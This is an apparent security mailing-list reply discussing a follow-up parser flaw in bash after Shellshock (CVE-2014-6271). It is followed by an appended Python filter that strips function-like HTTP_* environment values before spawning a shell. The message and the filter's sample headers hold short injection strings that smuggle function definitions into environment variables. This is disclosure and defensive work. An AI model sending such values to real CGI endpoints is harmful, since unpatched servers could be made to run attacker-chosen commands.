Date: Wed, 24 Sep 2014 15:37:03 -0700
From: Michal Zalewski <>
Cc: Tavis Ormandy <>
Subject: Re: CVE-2014-6271: remote code execution through bash

> Tavis Ormandy just tweeted this:

> $ env X='() { (a)=>\' sh -c "echo date"; cat echo

This can be simplified as:

$ X='() { function a a>\' bash -c echo
$ ls echo

And the core parsing problem is illustrated by this:

$ function a a>\ [RETURN]
> foo
$ whatever
$ ls

Tavis and I spent a fair amount of time trying to figure out if this
poses a more immediate risk, but so far, no dice. It strongly suggests
that the parser is fragile and that there may be unexpected side
effects, though; parsing functions seen in HTTP_* and such seems like
a very risky proposition.
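
Added example, not part of the original message: a stop-gap filter that drops function-like values from a CGI-style environment before a child shell sees them, so the parser discussed above never receives header-derived input. The function names and the sample request are hypothetical; the two flagged values are the strings quoted in this message.

```python
import re

# Pre-fix bash imports an environment value as a function definition when it
# starts with the four characters "() {". Matching optional whitespace before
# the brace is a deliberately broader check chosen for this example.
FUNCTION_LIKE = re.compile(r"^\(\)\s*\{")


def cgi_env_from_headers(headers):
    """Map request headers to CGI-style HTTP_* variable names."""
    return {"HTTP_" + name.upper().replace("-", "_"): value
            for name, value in headers.items()}


def scrub_env(env):
    """Return (clean_env, dropped_names); drops function-like values."""
    clean, dropped = {}, []
    for name, value in env.items():
        if FUNCTION_LIKE.match(value):
            dropped.append(name)
        else:
            clean[name] = value
    return clean, sorted(dropped)


# Constructed sample request; the two flagged values are the strings quoted
# in the message above, the others are benign filler.
SAMPLE_HEADERS = {
    "User-Agent": "Mozilla/5.0",
    "Referer": "() { (a)=>\\",
    "X-Test": "() { function a a>\\",
    "Accept": "text/html; note=() { mid-string",
}


def demo():
    env = cgi_env_from_headers(SAMPLE_HEADERS)
    env["PATH"] = "/usr/bin:/bin"
    return scrub_env(env)


if __name__ == "__main__":
    clean, dropped = demo()
    print("dropped:", dropped)
    print("kept:", sorted(clean))
```

The cleaned dictionary is what would be passed as the `env` argument when spawning the child process; the dropped names are worth logging as a detection signal.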

